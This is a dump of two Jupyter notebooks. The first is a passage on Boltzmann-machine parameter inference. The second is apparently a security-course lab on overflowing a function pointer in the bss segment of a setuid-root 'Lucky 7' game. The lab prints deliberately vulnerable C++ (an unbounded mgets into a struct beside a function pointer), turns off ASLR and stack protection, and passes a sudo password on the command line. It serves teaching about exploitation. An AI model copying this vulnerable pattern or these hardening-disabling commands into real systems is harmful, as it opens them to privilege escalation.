"def generate_seqs(n_var,n_seq,n_sample=30,g=1.0,w_true1=0.0):\n n_ops = n_var+int(n_var*(n_var-1)/2.0)\n #w_true = g*(np.random.rand(ops.shape[1])-0.5)/np.sqrt(float(n_var))\n if np.isscalar(w_true1):\n w_true = np.random.normal(0.,g/np.sqrt(n_var),size=n_ops)\n else:\n w_true = w_true1 \n samples = np.random.choice([1.0,-1.0],size=(n_seq*n_sample,n_var),replace=True)\n ops = operators(samples)\n #n_ops = ops.shape[1]\n\n sample_energy = energy_ops(ops,w_true)\n p = np.exp(sample_energy)\n p /= np.sum(p)\n out_samples = np.random.choice(np.arange(n_seq*n_sample),size=n_seq,replace=True,p=p)\n \n return w_true,samples[out_samples] #,p[out_samples],sample_energy[out_samples]",
"_____no_output_____"
],
[
"def hopfield_model(s):\n ops = operators(s)\n w = np.mean(ops,axis=0)\n #print('hopfield error ',nplin.norm(w-w_true))\n return w",
"_____no_output_____"
],
[
"def boltzmann_machine_exact(s,s_all,max_iter=150,alpha=5e-2,cov=False):\n n_seq,n_var = s.shape\n ops = operators(s)\n cov_inv = np.eye(ops.shape[1])\n ops_obs = np.mean(ops,axis=0)\n ops_model = operators(s_all)\n\n n_ops = ops.shape[1]\n \n np.random.seed(13)\n w = np.random.rand(n_ops)-0.5 \n for iterate in range(max_iter):\n energies_w = energy_ops(ops_model,w)\n probs_w = np.exp(energies_w)\n probs_w /= np.sum(probs_w)\n if iterate%10 == 0: \n #print(iterate,nplin.norm(w-w_true)) #,nplin.norm(spin_cov_w-spin_cov_obs))\n MSE = ((w-w_true)**2).mean()\n print(iterate,MSE)\n \n w += alpha*cov_inv.dot(ops_obs - np.sum(ops_model*probs_w[:,np.newaxis],axis=0))\n\n print('final',iterate,MSE)\n\n return w",
"_____no_output_____"
],
[
"def eps_machine(s,eps_scale=0.1,max_iter=151,alpha=0.1):\n MSE = np.zeros(max_iter)\n KL = np.zeros(max_iter)\n E_av = np.zeros(max_iter)\n \n n_seq,n_var = s.shape\n ops = operators(s)\n n_ops = ops.shape[1]\n cov_inv = np.eye(ops.shape[1])\n\n np.random.seed(13)\n w = np.random.rand(n_ops)-0.5 \n \n w_iter = np.zeros((max_iter,n_ops))\n for i in range(max_iter): \n #eps_scale = np.random.rand()/np.max([1.,np.max(np.abs(w))])\n \n energies_w = energy_ops(ops,w)\n probs_w = np.exp(energies_w*(eps_scale-1))\n z_data = np.sum(probs_w)\n probs_w /= z_data\n ops_expect_w = np.sum(probs_w[:,np.newaxis]*ops,axis=0)\n \n #if iterate%int(max_iter/5.0)==0:\n #E_exp = (probs_w*energies_w).sum()\n #KL[i] = -E_exp - np.log(z_data) + np.sum(np.log(np.cosh(w*eps_scale))) + n_var*np.log(2.)\n \n E_av[i] = energies_w.mean()\n MSE[i] = ((w-w_true)**2).mean()\n #print(RMSE[i])\n #print(eps_scale,iterate,nplin.norm(w-w_true),RMSE,KL,E_av)\n sec_order = w*eps_scale\n w += alpha*cov_inv.dot((ops_expect_w - sec_order)) \n #print('final ',eps_scale,iterate,nplin.norm(w-w_true)) \n #w_iter[i,:] = w\n \n return MSE,-E_av,w",
"_____no_output_____"
],
[
"max_iter = 100\n\nn_var,n_seq = 40,5000\ng = 1.0\n\nn_ops = n_var+int(n_var*(n_var-1)/2.0)\n\nw_true,seqs = generate_seqs(n_var,n_seq,g=g)\n#VP modification\nw_true1,seqs_test = generate_seqs(n_var,n_seq,g=g,w_true1=w_true)\n#eps_list = [0.25,0.3,0.35,0.4,0.45,0.5]\n#eps_list = [0.36,0.37,0.38,0.39,0.40,0.41,0.42,0.43,0.44]\neps_list = np.linspace(0.4,0.8,9)\nn_eps = len(eps_list)\nMSE = np.zeros((n_eps,max_iter))\nKL = np.zeros((n_eps,max_iter))\nE_av = np.zeros((n_eps,max_iter))\nw_eps = np.zeros((n_eps,n_ops))\nfor i,eps in enumerate(eps_list):\n print(eps)\n MSE[i,:],E_av[i,:],w_eps[i,:] = eps_machine(seqs,eps_scale=eps,max_iter=max_iter)",
"0.4\n0.45\n0.5\n0.55\n0.6000000000000001\n0.65\n0.7000000000000001\n0.75\n0.8\n"
],
[
"plt.plot(eps_list,E_av[:,-1])",
"_____no_output_____"
],
[
"# optimal eps\nieps = np.argmax(E_av[:,-1])\nprint('optimal eps:',ieps,eps_list[ieps])\n\nw = w_eps[ieps]",
"optimal eps: 5 0.65\n"
],
[
"plt.plot(w_true,w,'ro')\nplt.plot(w_true,w_true1,'ko',alpha=0.1)\nplt.plot([-0.6,0.6],[-0.6,0.6])",
"_____no_output_____"
],
[
"# # Z_all_true\n# s_all = np.asarray(list(itertools.product([1.0, -1.0], repeat=n_var)))\n# ops_all = operators(s_all)\n\n# E_all_true = energy_ops(ops_all,w_true)\n# P_all_true = np.exp(E_all_true)\n# Z_all_true = P_all_true.sum()\n# np.log(Z_all_true)",
"_____no_output_____"
],
[
"# random configs\n#n_random = 10000\n#i_random = np.random.choice(s_all.shape[0],n_random)\n#s_random = s_all[i_random]\n#ops_random = operators(s_random)\n\n#E_true = energy_ops(ops_random,w_true)\n#P_true = np.exp(E_true)\n\n#p0 = P_true/Z_all_true\n\n#VP modification - look at test seqs that are representative of the actual distribution\nops_test = operators(seqs_test)\n#E_true_test = energy_ops(ops_test,w_true)\n#P_true_test = np.exp(E_true_test)\n\n#p0_test = P_true_test/Z_all_true",
"_____no_output_____"
],
[
"seq_unique,i_seq,seq_count1 = np.unique(seqs,return_inverse=True,return_counts=True,axis=0)\nseq_count = seq_count1[i_seq]",
"_____no_output_____"
],
[
"#VP modification\nseq_unique_test,i_seq_test,seq_count1_test = np.unique(seqs_test,return_inverse=True,return_counts=True,axis=0)\nseq_count_test = seq_count1_test[i_seq_test]",
"_____no_output_____"
],
[
"def partition_data(seqs,eps=0.999): \n ops = operators(seqs)\n energies_w = energy_ops(ops,w)\n\n probs_w = np.exp(energies_w*(eps-1))\n z_data = np.sum(probs_w)\n probs_w /= z_data\n\n x = np.log(seq_count*probs_w).reshape(-1,1)\n y = eps*energies_w.reshape(-1,1)\n\n reg = LinearRegression().fit(x,y)\n score = reg.score(x,y)\n b = reg.intercept_[0]\n m = reg.coef_[0][0] # slope\n\n # set slope = 1\n lnZ_data = (eps*energies_w).mean() - (np.log(seq_count*probs_w)).mean()\n\n # exact (to compare)\n #probs_all = np.exp(eps*energies_all)\n #Z_all = np.sum(probs_all)\n #lnZ_all[i] = np.log(Z_all)\n\n print(eps,score,m,b,lnZ_data)\n \n return lnZ_data",
"_____no_output_____"
],
[
"#lnZ_data = partition_data(seqs,eps=0.9999)\n#print(lnZ_data)\n\n# Z_infer:\n#Z_infer = np.exp(lnZ_data) ### NOTE\n\n#E_infer = energy_ops(ops_random,w)\n#P_infer = np.exp(E_infer)\n#p1 = P_infer/Z_infer\n\n#plt.plot(-np.log(p0),-np.log(p1),'ko',markersize=3)\n#plt.plot([5,35],[5,35])",
"_____no_output_____"
],
[
"# Z_direct at eps = 1 : unique\nops_unique = operators(seq_unique)\n#energies_w = energy_ops(ops_unique,w)\n\n#probs_w = np.exp(energies_w)\n#Z_direct = (probs_w/seq_count1).mean()\n#lnZ_direct = np.log(Z_direct) + np.log(n_seq)\n#print(lnZ_direct)",
"_____no_output_____"
],
[
"# VP modification\nfreq_count1 = seq_count1/n_seq\nfreq_count1_test = seq_count1_test/n_seq\nops_unique_test = operators(seq_unique_test)\n\nfor i,eps in enumerate(eps_list):\n energies_w = energy_ops(ops_unique,w_eps[i,:])\n energies_w_test = energy_ops(ops_unique_test,w_eps[i,:])\n alpha = 1.5\n lnZ_unique = -np.mean(freq_count1**alpha * (-energies_w + np.log(freq_count1)))/np.mean(freq_count1**alpha )\n E_mean_f = -np.sum(energies_w*freq_count1)\n probs_test = np.exp(energies_w_test-lnZ_unique)\n print(eps,E_mean_f,lnZ_unique,-lnZ_unique - E_mean_f,np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test))",
"0.4 -28.450699869431947 33.79179142799946 -5.341091558567516 9.107327272477223\n0.45 -26.411333954044856 31.643131839800873 -5.231797885756016 1.383283956809521\n0.5 -24.957633710310546 30.146438929416696 -5.1888052191061504 0.2386077044108112\n0.55 -23.991541417980947 29.205220085526673 -5.213678667545725 0.045116645258484925\n0.6000000000000001 -23.4452122187589 28.753171864887115 -5.307959646128214 0.009597238379181909\n0.65 -23.281425497754114 28.756122232004603 -5.4746967342504895 0.0029238374535567307\n0.7000000000000001 -23.503254497055988 29.229054796262627 -5.7258002992066395 0.001809193482092694\n0.75 -24.16696006941197 30.256691606801148 -6.089731537389177 0.0017589491691205991\n0.8 -25.412708364472696 32.03873902428966 -6.626030659816966 0.0018618880217881298\n"
],
[
"# all obs\nops = operators(seqs)\nenergies_w = energy_ops(ops,w)\n\nprobs_w = np.exp(energies_w)\nZ_direct = (probs_w/seq_count).mean()\nlnZ_direct = np.log(Z_direct) + np.log(n_seq)\nprint(lnZ_direct)",
"29.03757238120805\n"
],
[
"# Z from optimal eps\neps0 = eps_list[ieps]\nprint(eps0)\n\nops_unique = operators(seq_unique)\nenergies_w = energy_ops(ops_unique,w)\nprobs_w = np.exp(eps0*energies_w)\n\nZ1 = (probs_w).sum()\nZ2 = (seq_count1*np.exp((eps0-1)*energies_w)).sum()\n\nlnZ = np.log(Z1*n_seq/Z2)\nprint(lnZ)",
"0.65\n26.100750795410487\n"
],
[
"seq_unique.shape[0]",
"_____no_output_____"
],
[
"# VP modification -1/13/2020\ndef free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=2e-1,toler=0.1):\n energies_w = energy_ops(ops_uniq,w)\n log_f_count = np.log(f_count_uniq)\n entropy = - np.sum(f_count_uniq*log_f_count)\n E_mean_f = -np.sum(energies_w*f_count_uniq)\n F_0 = E_mean_f - entropy\n F_gamma = F_0\n update = np.inf\n while update > toler:\n F_gamma_new = F_0 + np.sum(f_count_uniq*np.sinh(gamma*(F_gamma + energies_w - log_f_count)))/gamma\n print((F_gamma + energies_w - log_f_count)[3:7])\n update = np.abs(F_gamma - F_gamma_new)\n F_gamma = F_gamma_new\n return F_gamma\n\ndef free_energy_improved(f_count_uniq,ops_uniq,w,gamma=0.02,toler=5e-2):\n F_true = 4*(free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=gamma,toler=toler)-\\\n 0.25*free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=2*gamma,toler=toler))/3.0\n return F_true",
"_____no_output_____"
],
[
"# VP modification - 1/13/2020\n# try to get free energy by integrating mean energy over temperature\ndef free_energy_integrated(f_count_uniq,ops_uniq,w,d_beta=0.1,obs=True):\n E_mean_f = 0.0\n for i in range(int(1.0/d_beta)):\n bet = (i+0.5)*d_beta\n if obs: \n E_mean_f += -np.sum(energies_w*f_count_uniq**bet)/np.sum(f_count_uniq**bet) \n else:\n E_mean_f += -np.sum(energies_w*np.exp(energies_w*bet))/np.sum(np.exp(energies_w*bet))\n return E_mean_f*d_beta",
"_____no_output_____"
],
[
"# VP modification -1/13/2020\n# try to find free energy with the upper and lower bounds\nfreq_count1 = seq_count1/n_seq\nfreq_count1_test = seq_count1_test/n_seq\nops_unique_test = operators(seq_unique_test)\n\nE_mean_f_list = np.zeros(len(eps_list))\nlnZ_unique_list = np.zeros(len(eps_list))\nlnZ_unique_E_mean_list = np.zeros(len(eps_list))\nX_squared_list = np.zeros(len(eps_list))\nX_squared_list_train = np.zeros(len(eps_list))\n\nfor i,eps in enumerate(eps_list):\n energies_w = energy_ops(ops_unique,w_eps[i,:])\n energies_w_test = energy_ops(ops_unique_test,w_eps[i,:])\n # lnZ_unique = -free_energy_improved(freq_count1,ops_unique,w_eps[i,:],gamma=0.04,toler=1e-1)\n lnZ_unique = -free_energy_integrated(freq_count1,ops_unique,w_eps[i,:],obs=False)\n E_mean_f = -np.sum(energies_w*freq_count1)\n E_mean_f_test = -np.sum(energies_w_test*freq_count1_test)\n probs_test = np.exp(energies_w_test-lnZ_unique)\n probs_train = np.exp(energies_w-lnZ_unique)\n\n print(eps,E_mean_f,lnZ_unique,-lnZ_unique - E_mean_f,-lnZ_unique - E_mean_f_test,np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test))\n\n # 2020.01.13: Tai added \n E_mean_f_list[i] = E_mean_f\n lnZ_unique_list[i] = lnZ_unique\n lnZ_unique_E_mean_list[i] = -lnZ_unique - E_mean_f\n \n X_squared_list[i] = np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test) \n X_squared_list_train[i] = np.mean(((probs_train-freq_count1)**2)/freq_count1) ",
"0.4 -28.450699869431947 29.816594450813337 -1.36589458138139 0.3358916621199306 25908.82004046722\n0.45 -26.411333954044856 26.82372061693351 -0.4123866628886539 1.1397538526115163 21399.52803132499\n0.5 -24.957633710310546 24.70822714734211 0.249406562968435 1.6280225543498048 12874.249005683449\n0.55 -23.991541417980947 23.387862814612426 0.6036786033685217 1.76958943270105 5299.760983106453\n0.6000000000000001 -23.4452122187589 22.734919303666164 0.7102929150927366 1.6119217370367416 1661.1853915422469\n0.65 -23.281425497754114 22.646421828421936 0.6350036693321783 1.2094361305686725 452.81907172973024\n0.7000000000000001 -23.503254497055988 23.10275649508111 0.40049800197487784 0.5632846367074862 111.73308206944175\n0.75 -24.16696006941197 24.18340623950034 -0.01644617008836846 -0.39303930917712293 22.590747412816036\n0.8 -25.412708364472696 26.10799225689387 -0.6952838924211733 -1.8252947530261245 2.7825856392974826\n"
],
[
"nx,ny = 1,6\nfig, ax = plt.subplots(ny,nx,figsize=(nx*3,ny*2.2))\n\nax[0].plot(eps_list, MSE[:,-1],'ko-')\nax[1].plot(eps_list, E_mean_f_list,'ko-')\nax[2].plot(eps_list, lnZ_unique_list,'ko-')\nax[3].plot(eps_list, lnZ_unique_E_mean_list,'ko-')\nax[4].plot(eps_list, X_squared_list,'ko-')\nax[5].plot(eps_list, X_squared_list_train,'ko-')\n\nax[0].set_ylabel('MSE')\nax[1].set_ylabel('Energy')\nax[2].set_ylabel('LnZ')\nax[3].set_ylabel('-LnZ-Energy')\nax[4].set_ylabel('X_sequared_test')\nax[5].set_ylabel('X_sequared_train')\n\n\nplt.tight_layout(h_pad=0.5, w_pad=0.6)\n#plt.savefig('fig1.pdf', format='pdf', dpi=100)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2999fa4149089d6c5857e6fff18239d4693a1b | 63,515 | ipynb | Jupyter Notebook | GlobalSegmentOverflow.ipynb | rambasnet/Hacking-CPP-Notebooks | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | 1 | 2020-12-30T22:19:06.000Z | 2020-12-30T22:19:06.000Z | GlobalSegmentOverflow.ipynb | rambasnet/SystemSecurity | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | null | null | null | GlobalSegmentOverflow.ipynb | rambasnet/SystemSecurity | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | 1 | 2021-08-30T20:21:43.000Z | 2021-08-30T20:21:43.000Z | 35.168882 | 191 | 0.520727 | [
[
[
"# Global Segment Overflow\n- recall function pointers are pointers that store addresses of functions/code\n - see [Function-Pointers notebook](./Function-Pointers.ipynb) for a review\n- function pointers can be overwritten using overflow techniques to point to different code/function\n\n\n## Lucky 7 game\n- various luck-based games that're favored to the house\n- program uses a function pointer to remember the last game played by the user\n- the last game function's address is stored in the **User** structure\n- player object is declared as an uninitialized global variable\n - meaning the memory is allocated in the **bss** segment\n- seteuid multi-user program that stores player's data in /var folder\n- only root or sudo user can access players' info stored in /var folder\n- each player is identified by the system's user id\n- examine and compile and run game programs in demos/other_overflow/ folder\n- game is divided into one header file and 2 .cpp files\n- use the provided Makefile found in the same folder; uses C++17 specific features such as system specific file permission\n- NOTE: program must be setuid, to read/write the database file: `/var/lucky7.txt`",
"_____no_output_____"
]
],
[
[
"! cat demos/other_overflow/main.cpp",
"#include <stdio.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <time.h>\r\n#include <stdlib.h>\r\n#include <unistd.h> //getuid()\r\n#include <sys/types.h> // getuid()\r\n#include <iostream>\r\n#include \"lucky7.h\"\r\n\r\nchar DATAFILE[] = \"/var/lucky7.txt\"; // File to store players data\r\n\r\nusing namespace std;\r\n\r\n// Global variables\r\nUser player; // Player struct\r\n\r\nint main(int argc, char* argv[]) {\r\n int choice, last_game;\r\n\r\n if(not read_player_data(DATAFILE, player)) // Try to read player data from file.\r\n register_new_player(DATAFILE, player); // If there is no data, register a new player.\r\n\r\n do {\r\n choice = get_choice(player);\r\n if (choice < 4) {\r\n if (choice != last_game) {\r\n switch(choice) {\r\n case 1:\r\n cout << \"\\n~*~*~ Lucky 7 ~*~*~\\nCosts 10 credits to play this game.\\n\"\r\n << \"Machine will generate 1 random numbers each between 1 and 9.\\n\"\r\n << \"If the number is 7, you win a jackpot of 10 THOUSAND\\n\"\r\n << \"Otherwise, you lose.\\n\" << flush << endl;\r\n player.current_game = lucky7;\r\n break;\r\n case 2:\r\n cout << \"\\n~*~*~ Lucky 777 ~*~*~\\nCosts 50 credits to play this game.\\n\"\r\n << \"Machine will generate 3 random numbers each between 1 and 9.\\n\"\r\n << \"If all 3 numbers are 7, you win a jackpot of 100 THOUSAND\\n\"\r\n << \"If all 3 numbers match, you win 10 THOUSAND\\n\"\r\n << \"Otherwise, you lose.\\n Enter to continue...\" << flush << endl; \r\n player.current_game = lucky777;\r\n break;\r\n case 3:\r\n cout << \"\\n~*~*~ Lucky 77777 ~*~*~\\nCosts 100 credits to play this game.\\n\"\r\n << \"Machine will generate 5 random numbers each between 1 and 9.\\n\"\r\n << \"If all 5 numbers are 7, you win a jackpot of 1 MILLION\\n\"\r\n << \"If all 5 numbers match, you win 100 THOUSAND\\n\"\r\n << \"Otherwise, you lose.\\n Enter to continue...\" << flush << endl;\r\n player.current_game = lucky77777;\r\n break;\r\n }\r\n last_game = choice;\r\n } \r\n play_the_game();\r\n }\r\n else if (choice == 4)\r\n show_credits(player);\r\n else if (choice == 5) {\r\n change_username();\r\n update_player_data(DATAFILE, player);\r\n printf(\"Your name has been changed.\\n\\n\");\r\n }\r\n else if (choice == 6)\r\n reset_credit(DATAFILE, player);\r\n \r\n //cin.get();\r\n } while(choice !=7 );\r\n printf(\"\\nThanks for playing! 
Good Bye.\\n\");\r\n}\r\n\r\n\r\n// This function simply awards the jackpot for the Pick a Number game\r\nvoid jackpot10K() {\r\n printf(\"*+*+*+*+*+* JACKPOT 10 THOUSAND *+*+*+*+*+*\\n\");\r\n printf(\"Congratulations!\\n You have won the jackpot of 10000 (10K) credits!\\n\");\r\n player.credits += 10000;\r\n}\r\n\r\n// This function simply awards the jackpot for the lucky 777 game\r\nvoid jackpot100K() {\r\n printf(\"*+*+*+*+*+* JACKPOT 100 THOSAND *+*+*+*+*+*\\n\");\r\n printf(\"Congratulations!!!!\\n You have won the jackpot of 100000 (100K) credits!\\n\");\r\n player.credits += 100000;\r\n}\r\n\r\n// This function simply awards the jackpot for the lucky 77777 game\r\nvoid jackpot1M() {\r\n printf(\"*+*+*+*+*+* JACKPOT 1 MILLION *+*+*+*+*+*\\n\");\r\n printf(\"!!!!Congratulations!!!!You have won the jackpot of 100000 (1M) credits!\\n\");\r\n player.credits += 1000000;\r\n}\r\n\r\nbool has_credits() {\r\n if (player.current_game == lucky7 and player.credits >= 10) {\r\n player.credits -= 10;\r\n return true;\r\n }\r\n\r\n if (player.current_game == lucky777 and player.credits >= 50) {\r\n player.credits -= 50;\r\n return true;\r\n }\r\n\r\n if (player.current_game == lucky77777 and player.credits >= 100) {\r\n player.credits -= 100;\r\n return true;\r\n }\r\n\r\n return false;\r\n}\r\n\r\n// This function contains a loop to allow the current game to be\r\n// played again. It also writes the new credit totals to file\r\n// after each game is played.\r\nvoid play_the_game() { \r\n char again;\r\n int result;\r\n do {\r\n if (not has_credits()) {\r\n cout << \"Sorry, you're out of credit.\\nReset your credit to 500 to play again\\n\";\r\n break;\r\n }\r\n printf(\"\\n[DEBUG] current_game pointer 0x%08x\\n\", player.current_game);\r\n result = player.current_game();\r\n if( result == 1) // if won, give jackport\r\n jackpot10K();\r\n else if (result == 2)\r\n jackpot100K();\r\n else if (result == 3)\r\n jackpot1M();\r\n else\r\n cout << \"Sorry! Better luck next time...\\n\";\r\n\r\n printf(\"\\nYou have %u credits\\n\", player.credits);\r\n update_player_data(DATAFILE, player); // Write the new credit total to file.\r\n printf(\"Would you like to play again? [y/n]: \");\r\n cin >> again;\r\n cin.ignore(100, '\\n');\r\n } while(again == 'y' or again == 'Y');\r\n}\r\n\r\nvoid change_username() {\r\n printf(\"\\nChange user name\\n\");\r\n cout << \"Enter your new name:\\n\";\r\n mgets(player.name);\r\n}"
],
[
"! cat demos/other_overflow/lucky7.cpp",
"#include <stdio.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <time.h>\r\n#include <stdlib.h>\r\n#include <unistd.h> //getuid()\r\n#include <sys/types.h> // getuid()\r\n#include <iostream>\r\n#include <fstream>\r\n#include <iomanip>\r\n#include <filesystem> // file system specific permission\r\n\r\n#include \"lucky7.h\"\r\n\r\nusing namespace std;\r\nnamespace fs = std::filesystem;\r\n\r\nint get_choice(User &player) {\r\n size_t choice = 0;\r\n do{\r\n //system(\"clear\");\r\n cout << \"-=[ Lucky 7 Game Menu ]=-\\n\";\r\n cout << \"1 - Play Lucky 7 game\\n\";\r\n cout << \"2 - Play Lucky 777 game\\n\";\r\n cout << \"3 - Play Lucky 77777 game\\n\";\r\n cout << \"4 - View your total credits\\n\";\r\n cout << \"5 - Change your user name\\n\";\r\n cout << \"6 - Reset your account at 500 credits\\n\";\r\n cout << \"7 - Quit\\n\";\r\n printf(\"[Name: %s]\\n\", player.name);\r\n printf(\"[You have %u credits] -> \", player.credits);\r\n cout << \"Enter your choice [1-7]: \";\r\n cin >> choice;\r\n if(cin.fail())\r\n cin.clear();\r\n\r\n if ((choice < 1) || (choice > 7))\r\n cerr << \"The number \" << choice << \" is an invalid selection.\\n\\n\";\r\n else \r\n return choice;\r\n } while(true);\r\n}\r\n\r\n// This is the new user registration function.\r\n// It will create a new player account and append it to the file\r\nvoid register_new_player(char * data_file, User &player) { \r\n cout << \"-=-={ New Player Registration }=-=-\\n\";\r\n cout << \"Enter your name: \";\r\n mgets(player.name);\r\n player.uid = getuid();\r\n player.credits = 500;\r\n\r\n ofstream fout(data_file, ios::app);\r\n if(not fout) {\r\n cerr << \"Fatal error in register_new_player() while opening \" << data_file << \" file\\n\";\r\n exit(-1);\r\n }\r\n \r\n //fout << player.uid << \" \" << player.credits << \" \" << player.name << endl;\r\n fout << left << setw(10) << player.uid << setw(15) << player.credits << setw(100) << player.name << endl;\r\n fs::permissions(data_file, fs::perms::group_read|fs::perms::others_read, fs::perm_options::remove);\r\n fout.close();\r\n printf(\"\\nWelcome to the Lucky 7 Game %s.\\n\", player.name);\r\n printf(\"You have been given %u credits.\\n\", player.credits);\r\n}\r\n\r\n// This function writes the current player data to the file.\r\n// It is used primarily for updating the credits after games.\r\nvoid update_player_data(char * data_file, User &player) {\r\n int read_uid, credits;\r\n string name;\r\n fstream file(data_file, ios::out|ios::in);\r\n streampos position;\r\n if (!file) {\r\n cerr << \"Fatal error opening file \" << data_file << endl;\r\n exit(-1);\r\n }\r\n\r\n while(file >> read_uid) { // Loop until correct uid is found\r\n if (read_uid == player.uid) // found our line\r\n {\r\n file.seekg(-4, ios::cur);\r\n file << left << setw(10) << player.uid << setw(15) << player.credits << setw(100) << player.name << endl;\r\n break;\r\n }\r\n else {\r\n file >> credits;\r\n getline(file, name);\r\n }\r\n }\r\n file.close();\r\n}\r\n\r\nchar * mgets(char *dst) {\r\n char *ptr = dst;\r\n int ch; \r\n\t/* skip leading white spaces */ \r\n while (true) {\r\n ch = getchar();\r\n if (ch == ' ' or ch == '\\t' or ch == '\\n') continue;\r\n else break;\r\n }\r\n\r\n /* now read the rest until \\n or EOF */ \r\n while (true) {\r\n *(ptr++) = ch; \r\n ch = getchar();\r\n if (ch == '\\n' or ch == EOF) break;\r\n }\r\n *(ptr) = 0;\r\n return dst;\r\n}\r\n\r\nvoid show_credits(const User & player) {\r\n cout << setw(30) << setfill('=') << \"\\n\";\r\n 
cout << \"Name: \" << player.name << endl;\r\n cout << \"Credits: \" << player.credits << endl;\r\n cout << setw(20) << \"\\n\";\r\n cout << setfill(' ');\r\n}\r\n\r\nvoid printNumber(int randNumber) {\r\n int maxRoll = 10000;\r\n int num;\r\n for(int i=0; i<maxRoll; i++) {\r\n num = i%9+1;\r\n cout << num << flush;\r\n sleep(0.25);\r\n cout << \"\\b\" << flush;\r\n }\r\n cout << randNumber << \" \" << flush;\r\n \r\n}\r\n\r\n// win jackpot of 10K if random number 7 is generated\r\nint lucky7() {\r\n cout << \"the random number is: \" << flush;\r\n int num = get_random_number(9);\r\n printNumber(num);\r\n cout << endl;\r\n if (num == 7) return 1; //win jackpot\r\n else return 0; // loss\r\n}\r\n\r\n// win jackpot of 100K for 3 777 numbers\r\nint lucky777() {\r\n cout << \"3 random numers are: \" << flush;\r\n int num1 = get_random_number(9);\r\n printNumber(num1);\r\n\r\n int num2 = get_random_number(9);\r\n printNumber(num2);\r\n\r\n int num3 = get_random_number(9);\r\n printNumber(num3);\r\n\r\n cout << endl;\r\n if (num1 == 7 and num2 == 7 and num3 == 7) return 2; // jackpot\r\n else if (num1 == num2 and num2 == num3) return 1; // normal win\r\n else return 0;\r\n}\r\n\r\n// win Jackpot of 1M if all 5 random numbers are 77777\r\nint lucky77777() {\r\n cout << \"5 random numers are: \" << flush;\r\n int num1 = get_random_number(9);\r\n printNumber(num1);\r\n\r\n int num2 = get_random_number(9);\r\n printNumber(num2);\r\n\r\n int num3 = get_random_number(9);\r\n printNumber(num3);\r\n\r\n int num4 = get_random_number(9);\r\n printNumber(num4);\r\n\r\n int num5 = get_random_number(9);\r\n printNumber(num5);\r\n cout << endl;\r\n if (num1 == 7 and num2 == 7 and num3 == 7 and num4 == 7 and num5 ==7) return 3;\r\n else if (num1 == num2 and num2 == num3 and num3 == num4 and num4 == num5) return 2;\r\n else return 0;\r\n}\r\n\r\nvoid reset_credit(char * datafile, User & player) {\r\n player.credits = 500;\r\n update_player_data(datafile, player);\r\n}\r\n\r\nunsigned int get_random_number(int max) {\r\n srand(time(0)); // Seed the randomizer with the current time.\r\n int num = rand()%max+1;\r\n return num;\r\n}\r\n\r\nvoid rstrip(string &line) {\r\n int last_space = line.length()-1;\r\n while(line[last_space] == ' ') --last_space;\r\n line.erase(line.begin()+last_space+1, line.end());\r\n}"
]
],
[
[
"- change current working directory to other_overflow folder where the program and Makefile are\n- compile using the Makefile",
"_____no_output_____"
]
],
[
[
"%cd ./demos/other_overflow",
"/home/kali/projects/EthicalHacking/demos/other_overflow\n"
],
[
"! echo kali | sudo -S make",
"[sudo] password for kali: g++ -g -Wall -m32 -std=c++17 -fno-stack-protector -z execstack -no-pie lucky7.cpp main.cpp -o lucky7.exe \n# must run make with sudo to disable randomaize_va_space\necho 0 | tee /proc/sys/kernel/randomize_va_space\n0\nsudo chown root:root lucky7.exe \nsudo chmod +s lucky7.exe \n"
],
[
"# program uses /var/lucky7.txt to store player's information\n# let's take a look into it\n! echo kali | sudo -S cat /var/lucky7.txt\n# userid credits palaer's_full_name",
"[sudo] password for kali: 1000 10220 John Smith A�\u0004\b\r\n"
],
[
"# if file exists, delete it to start fresh\n! echo kali | sudo -S rm /var/lucky7.txt",
"[sudo] password for kali: "
],
[
"! ls -al /var/lucky7.txt",
"ls: cannot access '/var/lucky7.txt': No such file or directory\r\n"
],
[
"! ls -l lucky7.exe",
"-rwsr-sr-x 1 root root 257728 Jul 21 10:30 lucky7.exe\r\n"
]
],
[
[
"### play the interactive game\n- lucky is an interactive program that doesn't work with Jupyter Notebook as of Aug. 2021\n- Use Terminal to play the program; follow the menu provided by the program to play the game\n- press `CTRL-Z` to temporarily suspend (put it in background) the current process\n- enter `fg` command to bring the suspended program to fore ground\n\n```bash\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ ./lucky7.exe \nDatabase file doesn't exist: /var/lucky7.txt\n-=-={ New Player Registration }=-=-\nEnter your name: John Smith\n \nWelcome to the Lucky 7 Game John Smith. \nYou have been given 500 credits.\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 500 credits] -> Enter your choice [1-7]: 2\n\n~*~*~ Lucky 777 ~*~*~\nCosts 50 credits to play this game.\nMachine will generate 3 random numbers each between 1 and 9.\nIf all 3 numbers are 7, you win a jackpot of 100 THOUSAND\nIf all 3 numbers match, you win 10 THOUSAND\nOtherwise, you lose.\n Enter to continue...\n\n[DEBUG] current_game pointer 0x0804b1cd\n3 random numers are: 4 3 4 \nSorry! Better luck next time...\n\nYou have 450 credits\nWould you like to play again? [y/n]:\n```",
"_____no_output_____"
],
[
